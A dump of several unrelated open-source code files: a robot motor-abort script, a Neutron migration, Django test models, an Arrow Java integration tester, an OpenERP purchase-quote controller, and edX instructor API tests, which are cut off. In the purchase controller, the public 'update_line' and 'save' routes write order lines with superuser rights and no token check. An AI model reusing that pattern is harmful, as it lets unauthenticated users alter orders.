PWM.pin_association(GPIODEF.ENGINES["left"]["PWM"], 'left motor\'s PWM')
PWM.pin_association(GPIODEF.ENGINES["right"]["PWM"], 'right motor\'s PWM')
GPIO.pin_association(GPIODEF.ENGINES["left"]["forward"], 'left motor\'s forward pin')
GPIO.pin_association(GPIODEF.ENGINES["right"]["forward"], 'right motor\'s forward pin')
GPIO.pin_association(GPIODEF.ENGINES["left"]["backward"], 'left motor\'s backward pin')
GPIO.pin_association(GPIODEF.ENGINES["right"]["backward"], 'right motor\'s backward pin')
GPIO.setup_behavior('print')
PWM.setup_behavior('print')
else:
ROBOT_ROOT = ''
print('It seems like you are NOT working on an actual robot. \
You should set up a debugging environment before running any code (see documentation)')
#Logging Initialization :
LOGGER = robotLogger("abort", ROBOT_ROOT+'logs/')
###########################################################################
# I/O Initialization : #
###########################################################################
LOGGER.debug('Aborting');
MOTOR_LEFT = GPIODEF.ENGINES["left"]
MOTOR_RIGHT = GPIODEF.ENGINES["right"]
LOGGER.debug('Stopping motors');
#Start PWM with a 0% duty cycle
PWM.start(MOTOR_LEFT["PWM"], 0)
PWM.start(MOTOR_RIGHT["PWM"], 0)
#Declare motor enabling pins as outputs
GPIO.setup(MOTOR_LEFT["forward"], GPIO.OUT)
GPIO.setup(MOTOR_RIGHT["forward"], GPIO.OUT)
GPIO.setup(MOTOR_LEFT["backward"], GPIO.OUT)
GPIO.setup(MOTOR_RIGHT["backward"], GPIO.OUT)
#Set enabeling pins to LOW
########### NOTE ############
# To go forward : set forward pin to 1 and backward pin to 0
# To go backward : set backward pin to 1 and forward pin to 0
GPIO.output(MOTOR_LEFT["forward"], GPIO.LOW)
GPIO.output(MOTOR_RIGHT["forward"], GPIO.LOW)
GPIO.output(MOTOR_LEFT["backward"], GPIO.LOW)
GPIO.output(MOTOR_RIGHT["backward"], GPIO.LOW)
LOGGER.debug('Turning LEDs down');
for LED in LEDS_PINS:
#Declare motor enabling pins as outputs
GPIO.setup(LED, GPIO.OUT)
#Set pins to HIGH (LEDs off)
GPIO.output(LED, GPIO.HIGH)
LOGGER.debug('Abortion successfull');
| gpl-3.0 |
cernops/neutron | neutron/db/migration/alembic_migrations/versions/icehouse_release.py | 17 | 1406 | # Copyright 2014 Yahoo! Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""icehouse
Revision ID: icehouse
Revises: 5ac1c354a051
Create Date: 2013-03-28 00:00:00.000000
"""
# revision identifiers, used by Alembic.
revision = 'icehouse'
down_revision = '5ac1c354a051'
def upgrade():
"""A no-op migration for marking the Icehouse release."""
pass
def downgrade():
# We are purging all downgrade methods from icehouse to havana because:
# 1) havana is going to become unsupported during Kilo cycle.
# 2) most people will upgrade from icehouse, while a minor percentage
# from havana
# 3) downgrade use cases are mostly to revert after failed upgrades
# See discussion in https://review.openstack.org/109952 for details
raise NotImplementedError("Downgrade from icehouse to havana not "
"supported")
| apache-2.0 |
ulope/django | tests/model_fields/models.py | 21 | 9803 | import os
import tempfile
import uuid
import warnings
try:
from PIL import Image
except ImportError:
Image = None
from django.core.files.storage import FileSystemStorage
from django.db import models
from django.db.models.fields.files import ImageFieldFile, ImageField
from django.utils import six
class Foo(models.Model):
a = models.CharField(max_length=10)
d = models.DecimalField(max_digits=5, decimal_places=3)
def get_foo():
return Foo.objects.get(id=1)
class Bar(models.Model):
b = models.CharField(max_length=10)
a = models.ForeignKey(Foo, default=get_foo)
class Whiz(models.Model):
CHOICES = (
('Group 1', (
(1, 'First'),
(2, 'Second'),
)
),
('Group 2', (
(3, 'Third'),
(4, 'Fourth'),
)
),
(0, 'Other'),
)
c = models.IntegerField(choices=CHOICES, null=True)
class Counter(six.Iterator):
def __init__(self):
self.n = 1
def __iter__(self):
return self
def __next__(self):
if self.n > 5:
raise StopIteration
else:
self.n += 1
return (self.n, 'val-' + str(self.n))
class WhizIter(models.Model):
c = models.IntegerField(choices=Counter(), null=True)
class WhizIterEmpty(models.Model):
c = models.CharField(choices=(x for x in []), blank=True, max_length=1)
class BigD(models.Model):
d = models.DecimalField(max_digits=38, decimal_places=30)
class FloatModel(models.Model):
size = models.FloatField()
class BigS(models.Model):
s = models.SlugField(max_length=255)
class SmallIntegerModel(models.Model):
value = models.SmallIntegerField()
class IntegerModel(models.Model):
value = models.IntegerField()
class BigIntegerModel(models.Model):
value = models.BigIntegerField()
null_value = models.BigIntegerField(null=True, blank=True)
class PositiveSmallIntegerModel(models.Model):
value = models.PositiveSmallIntegerField()
class PositiveIntegerModel(models.Model):
value = models.PositiveIntegerField()
class Post(models.Model):
title = models.CharField(max_length=100)
body = models.TextField()
class NullBooleanModel(models.Model):
nbfield = models.NullBooleanField()
class BooleanModel(models.Model):
bfield = models.BooleanField(default=None)
string = models.CharField(max_length=10, default='abc')
class DateTimeModel(models.Model):
d = models.DateField()
dt = models.DateTimeField()
t = models.TimeField()
class PrimaryKeyCharModel(models.Model):
string = models.CharField(max_length=10, primary_key=True)
class FksToBooleans(models.Model):
"""Model with FKs to models with {Null,}BooleanField's, #15040"""
bf = models.ForeignKey(BooleanModel)
nbf = models.ForeignKey(NullBooleanModel)
class FkToChar(models.Model):
"""Model with FK to a model with a CharField primary key, #19299"""
out = models.ForeignKey(PrimaryKeyCharModel)
class RenamedField(models.Model):
modelname = models.IntegerField(name="fieldname", choices=((1, 'One'),))
class VerboseNameField(models.Model):
id = models.AutoField("verbose pk", primary_key=True)
field1 = models.BigIntegerField("verbose field1")
field2 = models.BooleanField("verbose field2", default=False)
field3 = models.CharField("verbose field3", max_length=10)
field4 = models.CommaSeparatedIntegerField("verbose field4", max_length=99)
field5 = models.DateField("verbose field5")
field6 = models.DateTimeField("verbose field6")
field7 = models.DecimalField("verbose field7", max_digits=6, decimal_places=1)
field8 = models.EmailField("verbose field8")
field9 = models.FileField("verbose field9", upload_to="unused")
field10 = models.FilePathField("verbose field10")
field11 = models.FloatField("verbose field11")
# Don't want to depend on Pillow in this test
#field_image = models.ImageField("verbose field")
field12 = models.IntegerField("verbose field12")
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
field13 = models.IPAddressField("verbose field13")
field14 = models.GenericIPAddressField("verbose field14", protocol="ipv4")
field15 = models.NullBooleanField("verbose field15")
field16 = models.PositiveIntegerField("verbose field16")
field17 = models.PositiveSmallIntegerField("verbose field17")
field18 = models.SlugField("verbose field18")
field19 = models.SmallIntegerField("verbose field19")
field20 = models.TextField("verbose field20")
field21 = models.TimeField("verbose field21")
field22 = models.URLField("verbose field22")
###############################################################################
# These models aren't used in any test, just here to ensure they validate
# successfully.
# See ticket #16570.
class DecimalLessThanOne(models.Model):
d = models.DecimalField(max_digits=3, decimal_places=3)
# See ticket #18389.
class FieldClassAttributeModel(models.Model):
field_class = models.CharField
###############################################################################
class DataModel(models.Model):
short_data = models.BinaryField(max_length=10, default=b'\x08')
data = models.BinaryField()
###############################################################################
# FileField
class Document(models.Model):
myfile = models.FileField(upload_to='unused')
###############################################################################
# ImageField
# If Pillow available, do these tests.
if Image:
class TestImageFieldFile(ImageFieldFile):
"""
Custom Field File class that records whether or not the underlying file
was opened.
"""
def __init__(self, *args, **kwargs):
self.was_opened = False
super(TestImageFieldFile, self).__init__(*args, **kwargs)
def open(self):
self.was_opened = True
super(TestImageFieldFile, self).open()
class TestImageField(ImageField):
attr_class = TestImageFieldFile
# Set up a temp directory for file storage.
temp_storage_dir = tempfile.mkdtemp(dir=os.environ['DJANGO_TEST_TEMP_DIR'])
temp_storage = FileSystemStorage(temp_storage_dir)
temp_upload_to_dir = os.path.join(temp_storage.location, 'tests')
class Person(models.Model):
"""
Model that defines an ImageField with no dimension fields.
"""
name = models.CharField(max_length=50)
mugshot = TestImageField(storage=temp_storage, upload_to='tests')
class AbsctractPersonWithHeight(models.Model):
"""
Abstract model that defines an ImageField with only one dimension field
to make sure the dimension update is correctly run on concrete subclass
instance post-initialization.
"""
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height')
mugshot_height = models.PositiveSmallIntegerField()
class Meta:
abstract = True
class PersonWithHeight(AbsctractPersonWithHeight):
"""
Concrete model that subclass an abctract one with only on dimension
field.
"""
name = models.CharField(max_length=50)
class PersonWithHeightAndWidth(models.Model):
"""
Model that defines height and width fields after the ImageField.
"""
name = models.CharField(max_length=50)
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
class PersonDimensionsFirst(models.Model):
"""
Model that defines height and width fields before the ImageField.
"""
name = models.CharField(max_length=50)
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
class PersonTwoImages(models.Model):
"""
Model that:
* Defines two ImageFields
* Defines the height/width fields before the ImageFields
* Has a nullalble ImageField
"""
name = models.CharField(max_length=50)
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
headshot_height = models.PositiveSmallIntegerField(
blank=True, null=True)
headshot_width = models.PositiveSmallIntegerField(
blank=True, null=True)
headshot = TestImageField(blank=True, null=True,
storage=temp_storage, upload_to='tests',
height_field='headshot_height',
width_field='headshot_width')
###############################################################################
class UUIDModel(models.Model):
field = models.UUIDField()
class NullableUUIDModel(models.Model):
field = models.UUIDField(blank=True, null=True)
class PrimaryKeyUUIDModel(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4)
| bsd-3-clause |
xhochy/arrow | dev/archery/archery/integration/tester_java.py | 6 | 5151 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import contextlib
import os
import subprocess
from .tester import Tester
from .util import run_cmd, ARROW_ROOT_DEFAULT, log
def load_version_from_pom():
import xml.etree.ElementTree as ET
tree = ET.parse(os.path.join(ARROW_ROOT_DEFAULT, 'java', 'pom.xml'))
tag_pattern = '{http://maven.apache.org/POM/4.0.0}version'
version_tag = list(tree.getroot().findall(tag_pattern))[0]
return version_tag.text
class JavaTester(Tester):
PRODUCER = True
CONSUMER = True
FLIGHT_SERVER = True
FLIGHT_CLIENT = True
JAVA_OPTS = ['-Dio.netty.tryReflectionSetAccessible=true',
'-Darrow.struct.conflict.policy=CONFLICT_APPEND']
_arrow_version = load_version_from_pom()
ARROW_TOOLS_JAR = os.environ.get(
'ARROW_JAVA_INTEGRATION_JAR',
os.path.join(ARROW_ROOT_DEFAULT,
'java/tools/target/arrow-tools-{}-'
'jar-with-dependencies.jar'.format(_arrow_version)))
ARROW_FLIGHT_JAR = os.environ.get(
'ARROW_FLIGHT_JAVA_INTEGRATION_JAR',
os.path.join(ARROW_ROOT_DEFAULT,
'java/flight/flight-core/target/flight-core-{}-'
'jar-with-dependencies.jar'.format(_arrow_version)))
ARROW_FLIGHT_SERVER = ('org.apache.arrow.flight.example.integration.'
'IntegrationTestServer')
ARROW_FLIGHT_CLIENT = ('org.apache.arrow.flight.example.integration.'
'IntegrationTestClient')
name = 'Java'
def _run(self, arrow_path=None, json_path=None, command='VALIDATE'):
cmd = ['java'] + self.JAVA_OPTS + \
['-cp', self.ARROW_TOOLS_JAR, 'org.apache.arrow.tools.Integration']
if arrow_path is not None:
cmd.extend(['-a', arrow_path])
if json_path is not None:
cmd.extend(['-j', json_path])
cmd.extend(['-c', command])
if self.debug:
log(' '.join(cmd))
run_cmd(cmd)
def validate(self, json_path, arrow_path):
return self._run(arrow_path, json_path, 'VALIDATE')
def json_to_file(self, json_path, arrow_path):
return self._run(arrow_path, json_path, 'JSON_TO_ARROW')
def stream_to_file(self, stream_path, file_path):
cmd = ['java'] + self.JAVA_OPTS + \
['-cp', self.ARROW_TOOLS_JAR,
'org.apache.arrow.tools.StreamToFile', stream_path, file_path]
if self.debug:
log(' '.join(cmd))
run_cmd(cmd)
def file_to_stream(self, file_path, stream_path):
cmd = ['java'] + self.JAVA_OPTS + \
['-cp', self.ARROW_TOOLS_JAR,
'org.apache.arrow.tools.FileToStream', file_path, stream_path]
if self.debug:
log(' '.join(cmd))
run_cmd(cmd)
def flight_request(self, port, json_path=None, scenario_name=None):
cmd = ['java'] + self.JAVA_OPTS + \
['-cp', self.ARROW_FLIGHT_JAR, self.ARROW_FLIGHT_CLIENT,
'-port', str(port)]
if json_path:
cmd.extend(('-j', json_path))
elif scenario_name:
cmd.extend(('-scenario', scenario_name))
else:
raise TypeError("Must provide one of json_path or scenario_name")
if self.debug:
log(' '.join(cmd))
run_cmd(cmd)
@contextlib.contextmanager
def flight_server(self, scenario_name=None):
cmd = ['java'] + self.JAVA_OPTS + \
['-cp', self.ARROW_FLIGHT_JAR, self.ARROW_FLIGHT_SERVER,
'-port', '0']
if scenario_name:
cmd.extend(('-scenario', scenario_name))
if self.debug:
log(' '.join(cmd))
server = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
output = server.stdout.readline().decode()
if not output.startswith("Server listening on localhost:"):
server.kill()
out, err = server.communicate()
raise RuntimeError(
"Flight-Java server did not start properly, "
"stdout:\n{}\n\nstderr:\n{}\n"
.format(output + out.decode(), err.decode()))
port = int(output.split(":")[1])
yield port
finally:
server.kill()
server.wait(5)
| apache-2.0 |
bringsvor/bc_website_purchase | controllers/main.py | 1 | 11590 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import SUPERUSER_ID
from openerp.addons.web import http
from openerp.addons.web.http import request
import werkzeug
import datetime
import time
import logging
import base64
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class purchase_quote(http.Controller):
@http.route([
"/purchase/<int:order_id>",
"/purchase/<int:order_id>/<token>"
], type='http', auth="public", website=True)
def view(self, order_id, token=None, message=False, **post):
# use SUPERUSER_ID allow to access/view order for public user
# only if he knows the private token
user_obj = request.registry.get('res.users')
group_obj = request.registry.get('res.groups')
user = user_obj.browse(request.cr,token and SUPERUSER_ID or request.uid, request.uid)
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, token and SUPERUSER_ID or request.uid, order_id)
now = time.strftime('%Y-%m-%d')
"""
if token:
if token != order.access_token:
return request.website.render('website.404')
if request.session.get('view_quote',False)!=now:
request.session['view_quote'] = now
body=_('Quotation viewed by supplier ')
self.__message_post(body, order_id, type='comment')
"""
# if token is None and ( request.uid==user.id and user.active==False ):
if ( request.uid==user.id and user.active==False ):
if request.env.ref('web.login', False):
values = request.params.copy() or {}
values["redirect"] = "/purchase/%i" % (order_id);
return request.render('web.login', values)
# Checks groups
broker = False
# import pdb;pdb.set_trace()
for group_id in user.groups_id:
group = group_obj.browse(request.cr,token and SUPERUSER_ID or request.uid, group_id.id)
if group.name == 'Elmatica Broker':
broker = True
if not broker:
partner_id = user.partner_id.parent_id.id or user.partner_id.id
if partner_id and request.uid != SUPERUSER_ID:
if partner_id != order.partner_id.id:
return request.website.render('website.404')
else:
if request.uid != SUPERUSER_ID:
return request.website.render('website.404')
if request.session.get('view_quote',False)!=now:
request.session['view_quote'] = now
body=_('Quotation viewed by supplier')
self.__message_post(body, order_id, type='comment')
# If the supplier is viewing this, he has received it. If he has received it it must be sent
order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'send_rfq', context=request.context)
days = 0
if order.validity_date:
days = (datetime.datetime.strptime(order.validity_date, '%Y-%m-%d') - datetime.datetime.now()).days + 1
values = {
'quotation': order,
'message': message and int(message) or False,
'option': bool(filter(lambda x: not x.line_id, order.options)),
'order_valid': (not order.validity_date) or (now <= order.validity_date),
'days_valid': max(days, 0)
}
return request.website.render('bc_website_purchase.po_quotation', values)
# @http.route(['/purchase/accept'], type='json', auth="public", website=True)
@http.route(['/purchase/<int:order_id>/<token>/accept'], type='http', auth="public", website=True)
def accept(self, order_id, token=None, signer=None, sign=None, **post):
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
if token != order.access_token:
return request.website.render('website.404')
attachments=sign and [('signature.png', sign.decode('base64'))] or []
order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'bid_received', context=request.context)
message = _('RFQ signed by %s') % (signer,)
self.__message_post(message, order_id, type='comment', subtype='mt_comment', attachments=attachments)
return werkzeug.utils.redirect("/purchase/%s" % (order_id))
@http.route(['/purchase/<int:order_id>/<token>/decline'], type='http', auth="public", website=True)
def decline(self, order_id, token, **post):
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
if token != order.access_token:
return request.website.render('website.404')
request.registry.get('purchase.order').action_cancel(request.cr, SUPERUSER_ID, [order_id])
message = post.get('decline_message')
if message:
self.__message_post(message, order_id, type='comment', subtype='mt_comment')
return werkzeug.utils.redirect("/purchase/%s/%s?message=2" % (order_id, token))
@http.route(['/purchase/<int:order_id>/<token>/post'], type='http', auth="public", website=True)
def post(self, order_id, token, **post):
# use SUPERUSER_ID allow to access/view order for public user
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
message = post.get('comment')
ufile = post.get('attachment')
attachment_ids = []
kwargs = {}
if token != order.access_token:
return request.website.render('website.404')
if ufile:
Model = request.session.model('ir.attachment')
try:
data_attach = {
'name': ufile.filename,
'datas': base64.encodestring(ufile.read()),
'datas_fname': ufile.filename,
'res_model': 'purchase.order',
'res_id': int(order_id)
}
attachment_id = Model.create( data_attach, request.context)
args = {
'filename': ufile.filename,
'id': attachment_id
}
#attachment_ids.append((0, 0, data_attach))
attachment_ids.append(attachment_id)
kwargs = { 'attachment_ids': attachment_ids }
except Exception:
args = {'error': "Something horrible happened"}
_logger.exception("Fail to upload attachment %s" % ufile.filename)
return werkzeug.utils.redirect("/purchase/%s/%s?message=0" % (order_id, token))
if message:
self.__message_post(message, order_id, type='comment', subtype='mt_comment',**kwargs)
return werkzeug.utils.redirect("/purchase/%s/%s?message=1" % (order_id, token))
# def __message_post(self, message, order_id, type='comment', subtype=False, attachments=[]):
def __message_post(self, message, order_id, type='comment', subtype=False, **kwargs):
request.session.body = message
cr, uid, context = request.cr, request.uid, request.context
user = request.registry['res.users'].browse(cr, SUPERUSER_ID, uid, context=context)
if 'body' in request.session and request.session.body:
request.registry.get('purchase.order').message_post(cr, SUPERUSER_ID, order_id,
body=request.session.body,
type=type,
subtype=subtype,
author_id=user.partner_id.id,
context=context,
attachments=None,
parent_id=False,
subject=None,
content_subtype='html',
**kwargs
)
request.session.body = False
return True
@http.route(['/purchase/update_line'], type='json', auth="public", website=True)
# def update_line(self, update_data, **post):
def update_line(self, **post):
order_id = post['order_id']
post_length = len(post['line_id'])
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID or request.uid, order_id)
if order.state not in ('draft','sent'):
return False
# import pdb;pdb.set_trace()
for i in range(len(post['line_id'])):
line_id = post['line_id'][i]
try:
leadtime = post['leadtime'][i]
except:
leadtime = 0
pass
price_unit = post['price_unit'][i]
vals = {
'price_unit': price_unit,
'leadtime': leadtime,
}
line_id=int(line_id)
order_line_obj = request.registry.get('purchase.order.line')
order_line_obj.write(request.cr, SUPERUSER_ID, [line_id], vals, context=request.context)
order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'bid_received', context=request.context)
return True
@http.route(['/purchase/save'], type='json', auth="public", website=True)
def save(self, **post):
order_id = post['order_id']
post_length = len(post['line_id'])
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID or request.uid, order_id)
if order.state not in ('draft','sent','confirmed','approved'):
return False
for i in range(len(post['line_id'])):
line_id = post['line_id'][i]
#try:
# leadtime = post['leadtime'][i]
#except:
# leadtime = 0
# pass
if order.state in ('draft','sent'):
price_unit = post['price_unit'][i]
vals = {
'price_unit': price_unit,
# 'leadtime': leadtime,
}
else:
vals = {
'date_code': post['date_code'][i],
'units_shipped': post['units_shipped'][i],
'weight': post['weight'][i],
'collies': post['collies'][i],
'units_in_stock': post['units_in_stock'][i],
'lot_week': post['lot_week'][i],
'lot_year': post['lot_year'][i],
'batch_number': post['batch_number'][i],
'tracking_number': post['tracking_number'][i],
'date_code': post['date_code'][i],
'expiry_date': post['expiry_date'][i],
}
line_id=int(line_id)
order_line_obj = request.registry.get('purchase.order.line')
order_line_obj.write(request.cr, SUPERUSER_ID, [line_id], vals, context=request.context)
order_obj.write(request.cr,SUPERUSER_ID,[order_id],{'saved': True},context=request.context)
return True
@http.route(["/purchase/template/<model('purchase.quote.template'):quote>"], type='http', auth="user", website=True)
def template_view(self, quote, **post):
values = { 'template': quote }
return request.website.render('bc_website_purchase.po_template', values)
| agpl-3.0 |
praveen-pal/edx-platform | lms/djangoapps/instructor/tests/test_api.py | 5 | 34544 | """
Unit tests for instructor.api methods.
"""
# pylint: disable=E1111
import unittest
import json
from urllib import quote
from django.conf import settings
from django.test import TestCase
from nose.tools import raises
from mock import Mock, patch
from django.test.utils import override_settings
from django.core.urlresolvers import reverse
from django.http import HttpRequest, HttpResponse
from django.contrib.auth.models import User
from courseware.tests.modulestore_config import TEST_DATA_MIXED_MODULESTORE
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from courseware.tests.helpers import LoginEnrollmentTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from student.tests.factories import UserFactory, AdminFactory
from student.models import CourseEnrollment
from courseware.models import StudentModule
# modules which are mocked in test cases.
import instructor_task.api
from instructor.access import allow_access
import instructor.views.api
from instructor.views.api import (
_split_input_list, _msk_from_problem_urlname, common_exceptions_400)
from instructor_task.api_helper import AlreadyRunningError
@common_exceptions_400
def view_success(request): # pylint: disable=W0613
"A dummy view for testing that returns a simple HTTP response"
return HttpResponse('success')
@common_exceptions_400
def view_user_doesnotexist(request): # pylint: disable=W0613
"A dummy view that raises a User.DoesNotExist exception"
raise User.DoesNotExist()
@common_exceptions_400
def view_alreadyrunningerror(request): # pylint: disable=W0613
"A dummy view that raises an AlreadyRunningError exception"
raise AlreadyRunningError()
class TestCommonExceptions400(unittest.TestCase):
"""
Testing the common_exceptions_400 decorator.
"""
def setUp(self):
self.request = Mock(spec=HttpRequest)
self.request.META = {}
def test_happy_path(self):
resp = view_success(self.request)
self.assertEqual(resp.status_code, 200)
def test_user_doesnotexist(self):
self.request.is_ajax.return_value = False
resp = view_user_doesnotexist(self.request)
self.assertEqual(resp.status_code, 400)
self.assertIn("User does not exist", resp.content)
def test_user_doesnotexist_ajax(self):
self.request.is_ajax.return_value = True
resp = view_user_doesnotexist(self.request)
self.assertEqual(resp.status_code, 400)
result = json.loads(resp.content)
self.assertIn("User does not exist", result["error"])
def test_alreadyrunningerror(self):
self.request.is_ajax.return_value = False
resp = view_alreadyrunningerror(self.request)
self.assertEqual(resp.status_code, 400)
self.assertIn("Task is already running", resp.content)
def test_alreadyrunningerror_ajax(self):
self.request.is_ajax.return_value = True
resp = view_alreadyrunningerror(self.request)
self.assertEqual(resp.status_code, 400)
result = json.loads(resp.content)
self.assertIn("Task is already running", result["error"])
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestInstructorAPIDenyLevels(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Ensure that users cannot access endpoints they shouldn't be able to.
"""
def setUp(self):
self.user = UserFactory.create()
self.course = CourseFactory.create()
CourseEnrollment.enroll(self.user, self.course.id)
self.client.login(username=self.user.username, password='test')
def test_deny_students_update_enrollment(self):
url = reverse('students_update_enrollment', kwargs={'course_id': self.course.id})
response = self.client.get(url, {})
self.assertEqual(response.status_code, 403)
def test_staff_level(self):
"""
Ensure that an enrolled student can't access staff or instructor endpoints.
"""
staff_level_endpoints = [
'students_update_enrollment',
'modify_access',
'list_course_role_members',
'get_grading_config',
'get_students_features',
'get_distribution',
'get_student_progress_url',
'reset_student_attempts',
'rescore_problem',
'list_instructor_tasks',
'list_forum_members',
'update_forum_role_membership',
'proxy_legacy_analytics',
]
for endpoint in staff_level_endpoints:
url = reverse(endpoint, kwargs={'course_id': self.course.id})
response = self.client.get(url, {})
self.assertEqual(response.status_code, 403)
def test_instructor_level(self):
"""
Ensure that a staff member can't access instructor endpoints.
"""
instructor_level_endpoints = [
'modify_access',
'list_course_role_members',
'reset_student_attempts',
'list_instructor_tasks',
'update_forum_role_membership',
]
for endpoint in instructor_level_endpoints:
url = reverse(endpoint, kwargs={'course_id': self.course.id})
response = self.client.get(url, {})
self.assertEqual(response.status_code, 403)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestInstructorAPIEnrollment(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test enrollment modification endpoint.
This test does NOT exhaustively test state changes, that is the
job of test_enrollment. This tests the response and action switch.
"""
def setUp(self):
self.instructor = AdminFactory.create()
self.course = CourseFactory.create()
self.client.login(username=self.instructor.username, password='test')
self.enrolled_student = UserFactory()
CourseEnrollment.enroll(
self.enrolled_student,
self.course.id
)
self.notenrolled_student = UserFactory()
self.notregistered_email = 'robot-not-an-email-yet@robot.org'
self.assertEqual(User.objects.filter(email=self.notregistered_email).count(), 0)
# uncomment to enable enable printing of large diffs
# from failed assertions in the event of a test failure.
# (comment because pylint C0103)
# self.maxDiff = None
def test_missing_params(self):
""" Test missing all query parameters. """
url = reverse('students_update_enrollment', kwargs={'course_id': self.course.id})
response = self.client.get(url)
self.assertEqual(response.status_code, 400)
def test_bad_action(self):
""" Test with an invalid action. """
action = 'robot-not-an-action'
url = reverse('students_update_enrollment', kwargs={'course_id': self.course.id})
response = self.client.get(url, {'emails': self.enrolled_student.email, 'action': action})
self.assertEqual(response.status_code, 400)
def test_enroll(self):
url = reverse('students_update_enrollment', kwargs={'course_id': self.course.id})
response = self.client.get(url, {'emails': self.notenrolled_student.email, 'action': 'enroll'})
print "type(self.notenrolled_student.email): {}".format(type(self.notenrolled_student.email))
self.assertEqual(response.status_code, 200)
# test that the user is now enrolled
self.assertEqual(
self.notenrolled_student.courseenrollment_set.filter(
course_id=self.course.id
).count(),
1
)
# test the response data
expected = {
"action": "enroll",
"auto_enroll": False,
"results": [
{
"email": self.notenrolled_student.email,
"before": {
"enrollment": False,
"auto_enroll": False,
"user": True,
"allowed": False,
},
"after": {
"enrollment": True,
"auto_enroll": False,
"user": True,
"allowed": False,
}
}
]
}
res_json = json.loads(response.content)
self.assertEqual(res_json, expected)
def test_unenroll(self):
url = reverse('students_update_enrollment', kwargs={'course_id': self.course.id})
response = self.client.get(url, {'emails': self.enrolled_student.email, 'action': 'unenroll'})
print "type(self.enrolled_student.email): {}".format(type(self.enrolled_student.email))
self.assertEqual(response.status_code, 200)
# test that the user is now unenrolled
self.assertEqual(
self.enrolled_student.courseenrollment_set.filter(
course_id=self.course.id,
is_active=1,
).count(),
0
)
# test the response data
expected = {
"action": "unenroll",
"auto_enroll": False,
"results": [
{
"email": self.enrolled_student.email,
"before": {
"enrollment": True,
"auto_enroll": False,
"user": True,
"allowed": False,
},
"after": {
"enrollment": False,
"auto_enroll": False,
"user": True,
"allowed": False,
}
}
]
}
res_json = json.loads(response.content)
self.assertEqual(res_json, expected)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestInstructorAPILevelsAccess(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test endpoints whereby instructors can change permissions
of other users.
This test does NOT test whether the actions had an effect on the
database, that is the job of test_access.
This tests the response and action switch.
Actually, modify_access does not having a very meaningful
response yet, so only the status code is tested.
"""
def setUp(self):
self.instructor = AdminFactory.create()
self.course = CourseFactory.create()
self.client.login(username=self.instructor.username, password='test')
self.other_instructor = UserFactory()
allow_access(self.course, self.other_instructor, 'instructor')
self.other_staff = UserFactory()
allow_access(self.course, self.other_staff, 'staff')
self.other_user = UserFactory()
def test_modify_access_noparams(self):
""" Test missing all query parameters. """
url = reverse('modify_access', kwargs={'course_id': self.course.id})
response = self.client.get(url)
self.assertEqual(response.status_code, 400)
def test_modify_access_bad_action(self):
""" Test with an invalid action parameter. """
url = reverse('modify_access', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'email': self.other_staff.email,
'rolename': 'staff',
'action': 'robot-not-an-action',
})
self.assertEqual(response.status_code, 400)
def test_modify_access_bad_role(self):
